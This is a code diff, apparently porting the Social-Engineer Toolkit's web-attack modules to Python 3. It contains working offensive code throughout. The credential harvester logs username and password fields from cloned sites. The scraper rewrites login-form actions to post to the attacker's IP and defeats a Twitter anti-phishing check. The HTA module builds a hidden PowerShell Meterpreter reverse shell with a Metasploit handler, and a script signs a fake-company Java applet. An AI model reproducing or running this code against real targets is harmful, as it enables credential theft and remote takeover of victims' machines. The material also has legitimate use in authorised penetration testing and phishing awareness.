os.chdir(homepath)
# put the params into site.template for later user
filewrite=file(setdir + "/site.template","a")
filewrite = open(setdir + "/site.template", "a")
filewrite.write("\n")
if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())):
filewrite3 = file("%s/src/logs/harvester.log" % os.getcwd(), "w")
filewrite3.write("")
filewrite3.close()
filewrite2 = file("%s/src/logs/harvester.log" % os.getcwd(), "a")
if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())):
filewrite3 = open("%s/src/logs/harvester.log" % os.getcwd(), "w")
filewrite3.write("")
filewrite3.close()
filewrite2 = open("%s/src/logs/harvester.log" % os.getcwd(), "a")
filewrite.write("\n\n")
print bcolors.RED+"[*] WE GOT A HIT! Printing the output:\r" + bcolors.GREEN
print(bcolors.RED + "[*] WE GOT A HIT! Printing the output:\r" + bcolors.GREEN)
for line in url:
counter=0
line=line.rstrip()
counter = 0
line = line.rstrip()
# if regular expression hit on user fields then do different
match=re.search("Email|email|login|logon|Logon|Login|user|username|Username",line)
match = re.search(
"Email|email|login|logon|Logon|Login|user|username|Username", line)
if match:
print bcolors.RED+"POSSIBLE USERNAME FIELD FOUND: "+line+"\r" + bcolors.GREEN
counter=1
match2=re.search("pwd|pass|uid|uname|Uname|userid|userID|USER|USERNAME|PIN|pin|password|Password|secret|Secret|Pass",line)
print(bcolors.RED + "POSSIBLE USERNAME FIELD FOUND: " + line + "\r" + bcolors.GREEN)
counter = 1
match2 = re.search(
"pwd|pass|uid|uname|Uname|userid|userID|USER|USERNAME|PIN|pin|password|Password|secret|Secret|Pass", line)
if match2:
# if you don't want to capture a password, turn this off, note not an exact science
# if you don't want to capture a password, turn this off, note
# not an exact science
log_password = check_config("HARVESTER_LOG_PASSWORDS=")
if log_password.lower() == "on":
print bcolors.RED+"POSSIBLE PASSWORD FIELD FOUND: "+line+"\r" + bcolors.GREEN
print(bcolors.RED + "POSSIBLE PASSWORD FIELD FOUND: " + line + "\r" + bcolors.GREEN)
else:
line = ""
counter=1
filewrite.write(cgi.escape("PARAM: "+line+"\n"))
filewrite2.write(line+"\n")
counter = 1
filewrite.write(cgi.escape("PARAM: " + line + "\n"))
filewrite2.write(line + "\n")
# if a counter hits at 0 then print this line
if counter==0:
print "PARAM: "+line+"\r"
if counter == 0:
print("PARAM: " + line + "\r")
# reset counter
counter=0
counter = 0
filewrite.write("BREAKHERE")
filewrite.close()
filewrite2.close()
if attack_vector != 'multiattack':
print bcolors.RED+"[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.\r\n\r\n" + bcolors.ENDC
print(bcolors.RED + "[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.\r\n\r\n" + bcolors.ENDC)
# pull URL field
counter=0
fileopen=file(setdir + "/site.template","r").readlines()
counter = 0
fileopen = open(setdir + "/site.template", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("URL=",line)
line = line.rstrip()
match = re.search("URL=", line)
if match:
RAW_URL=line.replace("URL=", "")
URL=line.replace("URL=http://", "")
URL=line.replace("URL=https://", "")
counter=1
if counter== 0: URL=''
RAW_URL = line.replace("URL=", "")
URL = line.replace("URL=http://", "")
URL = line.replace("URL=https://", "")
counter = 1
if counter == 0:
URL = ''
# this checks the set_config to see if we need to redirect to a different website instead of the one cloned
# this checks the set_config to see if we need to redirect to a
# different website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=")
if harvester_redirect.lower() == "on":
RAW_URL = check_config("HARVESTER_URL=")
counter = 1
# when done posting send them back to the original site
self.wfile.write('<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL))
self.wfile.write(
'<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL))
# set it back to our homepage
os.chdir(setdir + "/web_clone/")
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def run():
# check if we are not running apache mode
@ -358,37 +385,46 @@ def run():
visits.close()
bites.close()
except: pass
except:
pass
if attack_vector != 'multiattack':
try: reload(src.webattack.harvester.report_generator)
except: import src.webattack.harvester.report_generator
try:
reload(src.webattack.harvester.report_generator)
except:
import src.webattack.harvester.report_generator
if attack_vector != 'multiattack':
return_continue()
os.chdir(homepath)
httpd.socket.close()
# handle the rest
except Exception, e:
print bcolors.RED + "[*] Looks like the web_server can't bind to 80. Are you running Apache?" + bcolors.ENDC
apache_stop = raw_input("Do you want to attempt to disable Apache? [y/n]: ")
except Exception as e:
print(bcolors.RED + "[*] Looks like the web_server can't bind to 80. Are you running Apache?" + bcolors.ENDC)
apache_stop = input(
"Do you want to attempt to disable Apache? [y/n]: ")
apache_counter = 0
if apache_stop == "yes" or apache_stop == "y" or apache_stop == "":
if os.path.isfile("/etc/init.d/apache2"):
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
subprocess.Popen(
"/etc/init.d/apache2 stop", shell=True).wait()
apache_counter = 1
if os.path.isfile("/etc/init.d/httpd"):
subprocess.Popen("/etc/init.d/httpd stop", shell=True).wait()
subprocess.Popen("/etc/init.d/httpd stop",
shell=True).wait()
apache_counter = 1
if apache_counter == 1:
# check if we are running apache mode
print_status("Successfully stopped Apache. Starting the credential harvester.")
print_status("Harvester is ready, have victim browse to your site.")
print_status(
"Successfully stopped Apache. Starting the credential harvester.")
print_status(
"Harvester is ready, have victim browse to your site.")
if apache_check == False:
try:
try:
server = ThreadedHTTPServer(('', int(web_port)), SETHandler)
server = ThreadedHTTPServer(
('', int(web_port)), SETHandler)
server.serve_forever()
# handle keyboard interrupts
@ -398,10 +434,11 @@ def run():
visits.close()
bites.close()
except: pass
except:
pass
if attack_vector != 'multiattack':
sys.path.append("src/harvester")
import report_generator
from . import report_generator
if attack_vector != 'multiattack':
return_continue()
os.chdir(homepath)
@ -410,54 +447,62 @@ def run():
apache_counter = 0
if apache_counter == 0:
print bcolors.GREEN + "[*] Try disabling Apache and try SET again." + bcolors.ENDC
print "[*] Printing error: "+ str(e) + "\n"
print(bcolors.GREEN + "[*] Try disabling Apache and try SET again." + bcolors.ENDC)
print("[*] Printing error: " + str(e) + "\n")
return_continue()
exit_set()
# if we are using apache, then use the harvester php type that writes it out to post.php
# note just change the index.html to post somewhere else and rename the post.php to something else
# note just change the index.html to post somewhere else and rename the
# post.php to something else
if apache_check == True:
try:
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', int(web_port)))
ipaddr.settimeout(2)
if ipaddr: pass
if ipaddr:
pass
except Exception, e:
except Exception as e:
if os.path.isfile("/etc/init.d/apache2"):
apache_start = raw_input("[!] Apache may be not running, do you want SET to start the process? [y/n]: ")
apache_start = input(
"[!] Apache may be not running, do you want SET to start the process? [y/n]: ")
if apache_start == "y":
subprocess.Popen("/etc/init.d/apache2 start", shell=True).wait()
subprocess.Popen(
"/etc/init.d/apache2 start", shell=True).wait()
try:
apache_dir = check_config("APACHE_DIRECTORY=")
if os.path.isdir(apache_dir + "/html"): apache_dir = apache_dir + "/html"
print bcolors.GREEN + "Apache webserver is set to ON. Copying over PHP file to the website."
if os.path.isdir(apache_dir + "/html"):
apache_dir = apache_dir + "/html"
print(bcolors.GREEN + "Apache webserver is set to ON. Copying over PHP file to the website.")
except Exception, e:
print e
except Exception as e:
print(e)
print "Please note that all output from the harvester will be found under apache_dir/harvester_date.txt"
print "Feel free to customize post.php in the %s directory" % (apache_dir) + bcolors.ENDC
filewrite = file("%s/post.php" % (apache_dir), "w")
now=datetime.datetime.today()
filewrite.write("""<?php $file = 'harvester_%s.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=%s" />""" % (now, RAW_URL))
print("Please note that all output from the harvester will be found under apache_dir/harvester_date.txt")
print("Feel free to customize post.php in the %s directory" % (apache_dir) + bcolors.ENDC)
filewrite = open("%s/post.php" % (apache_dir), "w")
now = datetime.datetime.today()
filewrite.write(
"""<?php $file = 'harvester_%s.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=%s" />""" % (now, RAW_URL))
filewrite.close()
if os.path.isdir("/var/www/html"):
logpath = ("/var/www/html")
if os.path.isdir("/var/www/html"):
logpath = ("/var/www/html")
filewrite = file("%s/harvester_%s.txt" % (logpath,now), "w")
filewrite = open("%s/harvester_%s.txt" % (logpath, now), "w")
filewrite.write("")
filewrite.close()
# Check sys platform to perform chown
if sys.platform == "darwin":
subprocess.Popen("chown _www:_www '%s/harvester_%s.txt'" % (logpath,now), shell=True).wait()
subprocess.Popen("chown _www:_www '%s/harvester_%s.txt'" %
(logpath, now), shell=True).wait()
else:
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" % (logpath,now), shell=True).wait()
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" %
(logpath, now), shell=True).wait()
# if we are using webjacking, etc.
if os.path.isfile(setdir + "/web_clone/index2.html"):
@ -465,33 +510,42 @@ def run():
if os.path.isfile(apache_dir + "/index2.html"):
os.remove(apache_dir + "/index2.html")
shutil.copyfile(setdir + "/web_clone/index2.html", apache_dir + "/index2.html")
shutil.copyfile(setdir + "/web_clone/index2.html",
apache_dir + "/index2.html")
# here we specify if we are tracking users and such
if track_email == True:
fileopen = file (setdir + "/web_clone/index.html", "r")
fileopen = open(setdir + "/web_clone/index.html", "r")
data = fileopen.read()
data = data.replace("<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
filewrite = file(setdir + "/web_clone/index.2", "w")
data = data.replace(
"<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
filewrite = open(setdir + "/web_clone/index.2", "w")
filewrite.write(data)
filewrite.close()
os.remove(setdir + "/web_clone/index.html")
shutil.copyfile(setdir + "/web_clone/index.2", setdir + "/web_clone/index.html")
# copy the entire web_clone directory.
# Without this only index.php|html are copied even though the user may have chosen to import the entire directory in the set module.
shutil.copyfile(setdir + "/web_clone/index.2",
setdir + "/web_clone/index.html")
# copy the entire web_clone directory.
# Without this only index.php|html are copied even though the user
# may have chosen to import the entire directory in the set module.
copyfolder(setdir + "/web_clone", apache_dir)
if os.path.isfile("%s/index.html" % (apache_dir)):
os.remove("%s/index.html" % (apache_dir))
if track_email == False:
shutil.copyfile(setdir + "/web_clone/index.html", "%s/index.html" % (apache_dir))
shutil.copyfile(setdir + "/web_clone/index.html",
"%s/index.html" % (apache_dir))
if track_email == True:
shutil.copyfile(setdir + "/web_clone/index.html", "%s/index.php" % (apache_dir))
print_status("NOTE: The URL to click on is index.php NOT index.html with track emails.")
shutil.copyfile(setdir + "/web_clone/index.html",
"%s/index.php" % (apache_dir))
print_status(
"NOTE: The URL to click on is index.php NOT index.html with track emails.")
print_status("All files have been copied to %s" % (apache_dir))
if attack_vector != 'multiattack':
pause = raw_input("{Press return to continue}")
pause = input("{Press return to continue}")
class SecureHTTPServer(HTTPServer):
def __init__(self, server_address, HandlerClass):
BaseServer.__init__(self, server_address, HandlerClass)
# SSLv2 and SSLv3 supported
@ -500,71 +554,75 @@ class SecureHTTPServer(HTTPServer):
fpem_priv = 'newreq.pem'
fpem_cli = 'newcert.pem'
# establish private key
ctx.use_privatekey_file (fpem_priv)
ctx.use_privatekey_file(fpem_priv)
# establish public/client certificate
ctx.use_certificate_file(fpem_cli)
# setup the ssl socket
self.socket = SSL.Connection(ctx, socket.socket(self.address_family,self.socket_type))
self.socket = SSL.Connection(ctx, socket.socket(
self.address_family, self.socket_type))
# bind to interface
self.server_bind()
# activate the interface
self.server_activate()
def shutdown_request(self,request): request.shutdown()
def shutdown_request(self, request): request.shutdown()
def ssl_server(HandlerClass = SETHandler,ServerClass = SecureHTTPServer):
def ssl_server(HandlerClass=SETHandler, ServerClass=SecureHTTPServer):
# bind to all interfaces on 443
server_address = ('', 443) # (address, port)
server_address = ('', 443) # (address, port)
# setup the httpd server
httpd = ServerClass(server_address, HandlerClass)
# serve the httpd server until exit
httpd.serve_forever()
if track_email == True: webattack_email = True
if track_email == True:
webattack_email = True
# if emailer webattack, spawn email questions
if webattack_email == True:
try:
import src.phishing.smtp.client.smtp_web
except Exception, e:
except Exception as e:
reload(src.phishing.smtp.client.smtp_web)
# see if we're tabnabbing or multiattack
fileopen=file(setdir + "/attack_vector", "r")
fileopen = open(setdir + "/attack_vector", "r")
for line in fileopen:
line=line.rstrip()
line = line.rstrip()
if line == 'tabnabbing':
print bcolors.RED+ "\n[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs."
print(bcolors.RED + "\n[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs.")
if line == 'webjacking':
print bcolors.RED+ "\n[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link."
print(bcolors.RED + "\n[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.")
if ssl_flag == 'true':
web_port="443"
web_port = "443"
# check for PEM files here
if not os.path.isfile(setdir + "/newreq.pem"):
print "PEM files not detected. SSL will not work properly."
print("PEM files not detected. SSL will not work properly.")
if not os.path.isfile(setdir + "/newcert.pem"):
print "PEM files not detected. SSL will not work properly."
print("PEM files not detected. SSL will not work properly.")
# copy over our PEM files
subprocess.Popen("cp %s/*.pem %s/web_clone/" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp %s/*.pem %s/web_clone/" % (setdir, setdir),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# copy patched socket over to web clone
definepath = os.getcwd()
# we need to move a modified version of socket to handle SSL
shutil.copyfile("%s/src/core/patched/socket.py" % (definepath) , "%s/socket.py" % (definepath))
shutil.copyfile("%s/src/core/patched/socket.py" %
(definepath), "%s/socket.py" % (definepath))
# head over to cloned dir
if apache_check == False:
os.chdir(setdir + "/web_clone/")
if attack_vector != "multiattack":
if apache_check == False:
print bcolors.BLUE+"[*] The Social-Engineer Toolkit Credential Harvester Attack\r\n[*] Credential Harvester is running on port "+web_port+"\r"
print "[*] Information will be displayed to you as it arrives below:\r" + bcolors.ENDC
print(bcolors.BLUE + "[*] The Social-Engineer Toolkit Credential Harvester Attack\r\n[*] Credential Harvester is running on port " + web_port + "\r")
print("[*] Information will be displayed to you as it arrives below:\r" + bcolors.ENDC)
else:
print bcolors.BLUE+"[*] Apache is set to ON - everything will be placed in your web root directory of apache."
print bcolors.BLUE+"[*] Files will be written out to the root directory of apache."
print bcolors.BLUE+"[*] ALL files are within your Apache directory since you specified it to ON."
print(bcolors.BLUE + "[*] Apache is set to ON - everything will be placed in your web root directory of apache.")
print(bcolors.BLUE + "[*] Files will be written out to the root directory of apache.")
print(bcolors.BLUE + "[*] ALL files are within your Apache directory since you specified it to ON.")
# catch all
try:

93
src/webattack/harvester/report_generator.py
View file

@ -15,6 +15,8 @@ if not os.path.isdir(setdir + "/reports/"):
#
# Colors below
class bcolors:
PURPLE = '\033[95m'
BLUE = '\033[94m'
@ -30,80 +32,85 @@ class bcolors:
definepath = os.getcwd()
# grab URL and report information
now=datetime.datetime.today()
fileopen=file(setdir + "/site.template", "r")
site_template = file(setdir + "/site.template", "r").readlines()
fileopen1=file("%s/src/core/reports/index.html" % (definepath), "r")
now = datetime.datetime.today()
fileopen = open(setdir + "/site.template", "r")
site_template = open(setdir + "/site.template", "r").readlines()
fileopen1 = open("%s/src/core/reports/index.html" % (definepath), "r")
for line in fileopen:
match=re.search("URL=", line)
match = re.search("URL=", line)
if match:
url=line.replace("URL=http://", "")
url=line.replace("URL=https://", "")
filewrite2=file(setdir + "/reports/%s.xml" % (now), "a")
url = line.replace("URL=http://", "")
url = line.replace("URL=https://", "")
filewrite2 = open(setdir + "/reports/%s.xml" % (now), "a")
filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n")
filewrite2.write(r"<harvester>" + "\n")
for line2 in fileopen1:
counter=0
filewrite=file(setdir + "/reports/%s.html" % (now), "a")
match1=re.search("REPLACEHEREDUDE", line2)
counter = 0
filewrite = open(setdir + "/reports/%s.html" % (now), "a")
match1 = re.search("REPLACEHEREDUDE", line2)
if match1:
line2=line2.replace("REPLACEHEREDUDE", url)
line2 = line2.replace("REPLACEHEREDUDE", url)
filewrite.write(line2)
url_xml=url.rstrip()
url_xml = url.rstrip()
filewrite2.write(" %s" % (url_xml) + "\n")
counter=1
match2=re.search("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", line2)
counter = 1
match2 = re.search(
"If this is blank, SET did not get a successful attempt on the website, sorry hoss..", line2)
if match2:
line2=line2.replace("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", "Report findings on %s<br><br>" % (url))
counter=1
line2 = line2.replace(
"If this is blank, SET did not get a successful attempt on the website, sorry hoss..", "Report findings on %s<br><br>" % (url))
counter = 1
filewrite.write(line2)
opentag = True
for line3 in site_template:
match3=re.search("PARAM:", line3)
match3 = re.search("PARAM:", line3)
if match3:
xml=line3.replace("PARAM: ", "")
xml=xml.rstrip()
filewrite.write(line3+"<br>")
xml = line3.replace("PARAM: ", "")
xml = xml.rstrip()
filewrite.write(line3 + "<br>")
if opentag:
filewrite2.write(r" <url>")
opentag = False
filewrite2.write(r" <param>%s</param>" % (xml) + "\n")
match4=re.search("BREAKHERE", line3)
filewrite2.write(
r" <param>%s</param>" % (xml) + "\n")
match4 = re.search("BREAKHERE", line3)
if match4:
filewrite2.write(" </url>" + "\n")
opentag = True
filewrite.write("<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>")
filewrite.write(
"<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>")
# look for how many people visited the website
match5=re.search("VISITORSHERE", line2)
match5 = re.search("VISITORSHERE", line2)
if match5:
if os.path.isfile(setdir + "/visits.file"):
fileopen3=file(setdir + "/visits.file", "r")
counter5=0
fileopen3 = open(setdir + "/visits.file", "r")
counter5 = 0
for line in fileopen3:
if line != "":
line=line.rstrip()
counter5 = counter5+1
if line == "": counter5 = 0
line = line.rstrip()
counter5 = counter5 + 1
if line == "":
counter5 = 0
if not os.path.isfile(setdir + "/visits.file"):
counter5 = 0
line2=line2.replace("VISITORSHERE", str(counter5), 2)
line2 = line2.replace("VISITORSHERE", str(counter5), 2)
counter = 1
#filewrite.write(line2)
# filewrite.write(line2)
match6=re.search("BITESHERE", line2)
match6 = re.search("BITESHERE", line2)
if match6:
if os.path.isfile(setdir + "/bites.file"):
fileopen4=file(setdir + "/bites.file", "r")
fileopen4 = open(setdir + "/bites.file", "r")
counter5 = 0
for line in fileopen4:
line=line.rstrip()
counter5 = counter5+1
line = line.rstrip()
counter5 = counter5 + 1
if not os.path.isfile(setdir + "/bites.file"):
counter5=0
counter5 = 0
line2=line2.replace("BITESHERE", str(counter5))
line2 = line2.replace("BITESHERE", str(counter5))
counter = 1
filewrite.write(line2)
@ -114,8 +121,10 @@ try:
filewrite.close()
filewrite2.write(r"</harvester>" + "\n")
filewrite2.close()
except: pass
except:
pass
subprocess.Popen("cp -rf %s/src/core/reports/files %s/reports/" % (definepath,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (setdir,now) + bcolors.ENDC
print bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (setdir,now) + bcolors.ENDC
subprocess.Popen("cp -rf %s/src/core/reports/files %s/reports/" % (definepath,
setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (setdir, now) + bcolors.ENDC)
print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (setdir, now) + bcolors.ENDC)

71
src/webattack/harvester/scraper.py
View file

@ -4,7 +4,7 @@ import os
import sys
import re
import subprocess
import urlparse
import urllib.parse
import shutil
from src.core.setcore import *
@ -17,31 +17,33 @@ from src.core.setcore import *
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(setcore.setprompt("0", "IP address to connect back on: "))
ipaddr = input(setcore.setprompt(
"0", "IP address to connect back on: "))
update_options("IPADDR=" + ipaddr)
# set the multiattack tabnabbing/webjacking flag
multi_tabnabbing="off"
multi_webjacking="off"
multi_tabnabbing = "off"
multi_webjacking = "off"
if os.path.isfile(setdir + "/multi_tabnabbing"):
multi_tabnabbing="on"
multi_tabnabbing = "on"
if os.path.isfile(setdir + "/multi_webjacking"):
multi_webjacking="on"
multi_webjacking = "on"
# see if we're tabnabbing
fileopen=file(setdir + "/attack_vector", "r")
fileopen = open(setdir + "/attack_vector", "r")
for line in fileopen:
line=line.rstrip()
line = line.rstrip()
if line == 'tabnabbing' or multi_tabnabbing == "on" or line == 'webjacking' or multi_webjacking == "on":
site='index2.html'
site = 'index2.html'
else:
site='index.html'
site = 'index.html'
# set ssl flag to false by default
ssl_flag="false"
ssl_flag = "false"
# SEE IF WE WANT TO USE SSL
ssl_check = check_config("WEBATTACK_SSL=").lower()
if ssl_check == "on": ssl_flag = "true"
if ssl_check == "on":
ssl_flag = "true"
# check apache mode
apache_mode = check_config("APACHE_SERVER=").lower()
@ -53,39 +55,46 @@ if track_user == "on":
apache_rewrite = ""
# if we are turned on, change this
if apache_mode == "on": apache_rewrite = "post.php"
if apache_mode == "on":
apache_rewrite = "post.php"
# start the scraping process
fileopen=file(setdir + "/web_clone/%s" % (site),"r").readlines()
filewrite=file(setdir + "/web_clone/index.html.new","w")
fileopen = open(setdir + "/web_clone/%s" % (site), "r").readlines()
filewrite = open(setdir + "/web_clone/index.html.new", "w")
for line in fileopen:
# specify if it found post params
counter=0
counter = 0
# if we hit on a post method
match=re.search('post',line, flags=re.IGNORECASE)
method_post=re.search("method=post", line, flags=re.IGNORECASE)
match = re.search('post', line, flags=re.IGNORECASE)
method_post = re.search("method=post", line, flags=re.IGNORECASE)
if match or method_post:
# regex for now, can probably use htmlparser later, but right not what its doing is
# replacing any url on the "action" field with your victim IP which will have a custom
# web server running to post the data to your site
# regex for now, can probably use htmlparser later, but right not what its doing is
# replacing any url on the "action" field with your victim IP which will have a custom
# web server running to post the data to your site
if ssl_flag == 'false':
line=re.sub('action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)
line = re.sub(
'action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
line = re.sub(
'action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
if ssl_flag == 'true':
line=re.sub('action="http?\w://[\w.\?=/&]*/', 'action="https://%s/' % (ipaddr), line)
line = re.sub(
'action="http?\w://[\w.\?=/&]*/', 'action="https://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
line = re.sub(
'action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
# this is if twitter is in use, we rename a function name to something garbage to remove password phishing restrictions
match2 = re.search("swiftActionQueue={buckets:j", line, flags=re.IGNORECASE)
# this is if twitter is in use, we rename a function name to something
# garbage to remove password phishing restrictions
match2 = re.search(
"swiftActionQueue={buckets:j", line, flags=re.IGNORECASE)
if match2:
# garble the buckets name, causes password to not be jacked
line = line.replace("swiftActionQueue={buckets:j", "swiftActionQueue={3buckets:j")
line = line.replace(
"swiftActionQueue={buckets:j", "swiftActionQueue={3buckets:j")
filewrite.write(line)
@ -97,5 +106,5 @@ if os.path.isfile(setdir + "/web_clone/index.html.new"):
shutil.copyfile(setdir + "/web_clone/index.html.new", setdir + "/" + site)
if os.path.isfile(setdir + "/web_clone/" + site):
os.remove(setdir + "/web_clone/" + site)
shutil.move(setdir + "/web_clone/index.html.new", setdir + "/web_clone/%s" % (site))
shutil.move(setdir + "/web_clone/index.html.new",
setdir + "/web_clone/%s" % (site))

74
src/webattack/hta/main.py
View file

@ -6,41 +6,51 @@
######################################################
from src.core.setcore import *
def gen_hta_cool_stuff():
print_status("HTA Attack Vector selected. Enter your IP, Port, and Payload...")
ipaddr = raw_input("Enter the IP address for the reverse payload (LHOST): ")
update_options("IPADDR=%s" % (ipaddr))
port = raw_input("Enter the port for the reverse payload [443]: ")
if port == "": port = "443"
print """Select the payload you want to deliver:\n\n 1. Meterpreter Reverse TCP\n 2. Meterpreter Reverse HTTP\n 3. Meterpreter Reverse HTTPS\n"""
selection = raw_input("Enter the payload number [1-3]: ")
print_status(
"HTA Attack Vector selected. Enter your IP, Port, and Payload...")
ipaddr = input(
"Enter the IP address for the reverse payload (LHOST): ")
update_options("IPADDR=%s" % (ipaddr))
port = input("Enter the port for the reverse payload [443]: ")
if port == "":
port = "443"
print("""Select the payload you want to deliver:\n\n 1. Meterpreter Reverse TCP\n 2. Meterpreter Reverse HTTP\n 3. Meterpreter Reverse HTTPS\n""")
selection = input("Enter the payload number [1-3]: ")
# define the payloads
if selection == "": selection = "3"
if selection == "1": selection = "windows/meterpreter/reverse_tcp"
if selection == "2": selection = "windows/meterpreter/reverse_http"
if selection == "3": selection = "windows/meterpreter/reverse_https"
# define the payloads
if selection == "":
selection = "3"
if selection == "1":
selection = "windows/meterpreter/reverse_tcp"
if selection == "2":
selection = "windows/meterpreter/reverse_http"
if selection == "3":
selection = "windows/meterpreter/reverse_https"
# generate powershell code
print_status("Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload(selection, ipaddr, port, "x86")
command = "powershell -window hidden -enc " + ps
# hta code here
print_status("Embedding HTA attack vector and PowerShell injection...")
main1 = """<script>\na=new ActiveXObject("WScript.Shell");\na.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);window.close();\n</script>""" % (command)
main2 = """<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>"""
# generate powershell code
print_status(
"Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload(
selection, ipaddr, port, "x86")
command = "powershell -window hidden -enc " + ps
# hta code here
print_status("Embedding HTA attack vector and PowerShell injection...")
main1 = """<script>\na=new ActiveXObject("WScript.Shell");\na.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);window.close();\n</script>""" % (command)
main2 = """<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>"""
# metasploit answer file here
filewrite = file(setdir + "/meta_config", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port))
filewrite.close()
# metasploit answer file here
filewrite = open(setdir + "/meta_config", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port))
filewrite.close()
# write out main1 and main2
filewrite = file(setdir + "/hta_index", "w")
filewrite.write(main2)
filewrite.close()
# write out main1 and main2
filewrite = open(setdir + "/hta_index", "w")
filewrite.write(main2)
filewrite.close()
# write out launcher.hta
filewrite = file(setdir + "/Launcher.hta", "w")
filewrite.write(main1)
filewrite.close()
# write out launcher.hta
filewrite = open(setdir + "/Launcher.hta", "w")
filewrite.write(main1)
filewrite.close()

20
src/webattack/java_applet/sign_jar.py
View file

@ -5,7 +5,7 @@
import subprocess
import os
try:
print """
print("""
Simply enter in the required fields, easy example below:
Name: FakeCompany
@ -16,16 +16,20 @@ State: Ohio
Country: US
Is this correct: yes
"""
print """*** WARNING ***\nIN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk\n*** WARNING ***"""
""")
print("""*** WARNING ***\nIN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk\n*** WARNING ***""")
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias signapplet2 -keystore mykeystore -keypass mykeypass -storepass mystorepass", shell=True).wait()
subprocess.Popen(
"keytool -genkey -alias signapplet2 -keystore mykeystore -keypass mykeypass -storepass mystorepass", shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Obf.jar signapplet2", shell=True).wait()
subprocess.Popen(
"jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Obf.jar signapplet2", shell=True).wait()
# move it into our html directory
subprocess.Popen("rm ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen("cp Signed_Update.jar ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen("cp Java_Obf.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
print "[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)"
subprocess.Popen(
"cp Signed_Update.jar ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen(
